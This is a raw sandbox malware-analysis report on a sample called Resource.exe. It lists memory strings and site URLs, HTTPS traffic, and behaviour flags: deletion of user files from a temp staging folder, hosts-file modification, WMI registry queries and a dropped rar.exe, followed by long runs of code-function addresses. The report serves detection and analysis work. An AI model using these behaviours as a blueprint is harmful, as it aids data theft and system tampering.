Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: Resource.exe, 00000001.00000003.2197829260.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190023337.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2196747987.0000020AB3E39000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190835333.0000020AB3E39000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263418579.0000020AB4691000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Resource.exe, 00000001.00000003.2263418579.0000020AB4691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contF
Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3BFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: Resource.exe, 00000001.00000003.2194450879.0000020AB3E55000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2183140611.0000020AB3E55000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Resource.exe, 00000001.00000002.2472629307.0000020AB3932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: Resource.exe, 00000001.00000003.2161807649.0000020AB3E3F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2164773862.0000020AB3E3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Resource.exe, 00000001.00000002.2477629542.0000020AB4FAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmp, Resource.exe, 00000001.00000002.2482832538.00007FF8A8799000.00000004.00000001.01000000.0000000F.sdmp, libcrypto-3.dll.0.dr	String found in binary or memory: https://www.openssl.org/H
Source: Resource.exe, 00000001.00000002.2472003336.0000020AB30E0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: Resource.exe, Resource.exe, 00000001.00000002.2483357030.00007FF8A8D68000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: Resource.exe, 00000001.00000002.2475663980.0000020AB4088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\Resource.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BJZFPPWAPT.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\TQDFJHPUIU.png	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\TQDFJHPUIU.png	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\JDDHMPCDUJ.jpg	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\EFOYFBOLXA.jpg	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\Resource.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: cmd.exe

Process created: 74

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe

Code function: 103_2_00007FF6185E3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,

103_2_00007FF6185E3A70

Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe

Code function: 103_2_00007FF61860B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

103_2_00007FF61860B57C

Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C0F38	0_2_00007FF6E60C0F38
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B7E4C	0_2_00007FF6E60B7E4C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C6370	0_2_00007FF6E60C6370
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60A7950	0_2_00007FF6E60A7950
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C72BC	0_2_00007FF6E60C72BC
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60A1F50	0_2_00007FF6E60A1F50
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B7E4C	0_2_00007FF6E60B7E4C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60A8FD0	0_2_00007FF6E60A8FD0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C9FF8	0_2_00007FF6E60C9FF8
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60BE01C	0_2_00007FF6E60BE01C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B1880	0_2_00007FF6E60B1880
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B20A0	0_2_00007FF6E60B20A0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B2D50	0_2_00007FF6E60B2D50
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C6D70	0_2_00007FF6E60C6D70
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C65EC	0_2_00007FF6E60C65EC
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B1E94	0_2_00007FF6E60B1E94
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B86D0	0_2_00007FF6E60B86D0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B36E0	0_2_00007FF6E60B36E0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C1EE4	0_2_00007FF6E60C1EE4
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B5F30	0_2_00007FF6E60B5F30
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C471C	0_2_00007FF6E60C471C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60BA430	0_2_00007FF6E60BA430
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B1C90	0_2_00007FF6E60B1C90
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60BE4B0	0_2_00007FF6E60BE4B0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B7C98	0_2_00007FF6E60B7C98
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C0F38	0_2_00007FF6E60C0F38
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C4280	0_2_00007FF6E60C4280
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B1A84	0_2_00007FF6E60B1A84
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B22A4	0_2_00007FF6E60B22A4
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B3AE4	0_2_00007FF6E60B3AE4
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60BEB30	0_2_00007FF6E60BEB30
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A81818A0	1_2_00007FF8A81818A0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8797B30	1_2_00007FF8A8797B30
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87F0A50	1_2_00007FF8A87F0A50
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8849A70	1_2_00007FF8A8849A70
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87E8CF0	1_2_00007FF8A87E8CF0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A88340D0	1_2_00007FF8A88340D0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87E8290	1_2_00007FF8A87E8290
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A882F890	1_2_00007FF8A882F890
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8851850	1_2_00007FF8A8851850
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87DE980	1_2_00007FF8A87DE980
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8815930	1_2_00007FF8A8815930
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D6948	1_2_00007FF8A87D6948
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8831A80	1_2_00007FF8A8831A80
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8864AB0	1_2_00007FF8A8864AB0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87DAAB0	1_2_00007FF8A87DAAB0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8856BE0	1_2_00007FF8A8856BE0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A881CB50	1_2_00007FF8A881CB50
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87EBB70	1_2_00007FF8A87EBB70
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87F7C90	1_2_00007FF8A87F7C90
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D3CA0	1_2_00007FF8A87D3CA0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8829CD0	1_2_00007FF8A8829CD0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8828DF0	1_2_00007FF8A8828DF0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87F2D20	1_2_00007FF8A87F2D20
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D6D42	1_2_00007FF8A87D6D42
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87DFD60	1_2_00007FF8A87DFD60
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8817E10	1_2_00007FF8A8817E10
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A883DE70	1_2_00007FF8A883DE70
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8840FC0	1_2_00007FF8A8840FC0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D8F10	1_2_00007FF8A87D8F10
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87FBF40	1_2_00007FF8A87FBF40
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87E70C0	1_2_00007FF8A87E70C0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D40F0	1_2_00007FF8A87D40F0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87EC1C0	1_2_00007FF8A87EC1C0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87E1120	1_2_00007FF8A87E1120
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87F62C0	1_2_00007FF8A87F62C0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87F52D0	1_2_00007FF8A87F52D0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8871250	1_2_00007FF8A8871250
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D4390	1_2_00007FF8A87D4390
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A88573F0	1_2_00007FF8A88573F0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87FD3F0	1_2_00007FF8A87FD3F0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8844310	1_2_00007FF8A8844310
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87EB310	1_2_00007FF8A87EB310
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8813370	1_2_00007FF8A8813370
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A883F360	1_2_00007FF8A883F360
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D9480	1_2_00007FF8A87D9480
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87FB490	1_2_00007FF8A87FB490
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A881E4F0	1_2_00007FF8A881E4F0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A88394F0	1_2_00007FF8A88394F0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D6400	1_2_00007FF8A87D6400
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8858430	1_2_00007FF8A8858430
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A887E430	1_2_00007FF8A887E430
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87E25F0	1_2_00007FF8A87E25F0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87FF570	1_2_00007FF8A87FF570
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A880A6B5	1_2_00007FF8A880A6B5
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A882D6A0	1_2_00007FF8A882D6A0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A88646C0	1_2_00007FF8A88646C0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8804610	1_2_00007FF8A8804610
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A88287A0	1_2_00007FF8A88287A0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A881D700	1_2_00007FF8A881D700
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87FC720	1_2_00007FF8A87FC720
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8838770	1_2_00007FF8A8838770
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A88808A0	1_2_00007FF8A88808A0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A888F840	1_2_00007FF8A888F840
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87D2850	1_2_00007FF8A87D2850
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A87E5850	1_2_00007FF8A87E5850
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8F29F90	1_2_00007FF8A8F29F90
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A9315DC0	1_2_00007FF8A9315DC0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A9308AA0	1_2_00007FF8A9308AA0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1A0F	1_2_00007FF8A92D1A0F
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1CC1	1_2_00007FF8A92D1CC1
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D16FE	1_2_00007FF8A92D16FE
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D8BE0	1_2_00007FF8A92D8BE0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D143D	1_2_00007FF8A92D143D
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A933CDA0	1_2_00007FF8A933CDA0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D2716	1_2_00007FF8A92D2716
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1181	1_2_00007FF8A92D1181
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1613	1_2_00007FF8A92D1613
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D262B	1_2_00007FF8A92D262B
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D17F8	1_2_00007FF8A92D17F8
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A9310F90	1_2_00007FF8A9310F90
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92F6290	1_2_00007FF8A92F6290
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1AD7	1_2_00007FF8A92D1AD7
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1EE7	1_2_00007FF8A92D1EE7
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1D98	1_2_00007FF8A92D1D98
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1B54	1_2_00007FF8A92D1B54
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A934A740	1_2_00007FF8A934A740
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1172	1_2_00007FF8A92D1172
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1FE6	1_2_00007FF8A92D1FE6
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A931D960	1_2_00007FF8A931D960
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A93199A0	1_2_00007FF8A93199A0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A931DE30	1_2_00007FF8A931DE30
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1541	1_2_00007FF8A92D1541
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1591	1_2_00007FF8A92D1591
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92FBD80	1_2_00007FF8A92FBD80
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D21F3	1_2_00007FF8A92D21F3
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A9397200	1_2_00007FF8A9397200
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D24EB	1_2_00007FF8A92D24EB
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D149C	1_2_00007FF8A92D149C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D13DE	1_2_00007FF8A92D13DE
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A9343330	1_2_00007FF8A9343330
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92E7630	1_2_00007FF8A92E7630
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D21D5	1_2_00007FF8A92D21D5
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1C12	1_2_00007FF8A92D1C12
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1555	1_2_00007FF8A92D1555
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E02110	1_2_00007FF8B7E02110
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7DF18F0	1_2_00007FF8B7DF18F0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7DF1000	1_2_00007FF8B7DF1000
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7DF12B0	1_2_00007FF8B7DF12B0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E1A0E8	1_2_00007FF8B7E1A0E8
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E19AA8	1_2_00007FF8B7E19AA8
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E189C8	1_2_00007FF8B7E189C8
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E1A434	1_2_00007FF8B7E1A434
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E15750	1_2_00007FF8B7E15750
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E1830C	1_2_00007FF8B7E1830C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E1B6BC	1_2_00007FF8B7E1B6BC
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E196B0	1_2_00007FF8B7E196B0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E40690	1_2_00007FF8B7E40690
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E51060	1_2_00007FF8B7E51060
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E66DC0	1_2_00007FF8B7E66DC0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B8AF8290	1_2_00007FF8B8AF8290
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF8476D3DAA	14_2_00007FF8476D3DAA
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D0A2C	103_2_00007FF6185D0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F7B24	103_2_00007FF6185F7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185CABA0	103_2_00007FF6185CABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185EAE10	103_2_00007FF6185EAE10
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D1180	103_2_00007FF6185D1180
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185C82F0	103_2_00007FF6185C82F0
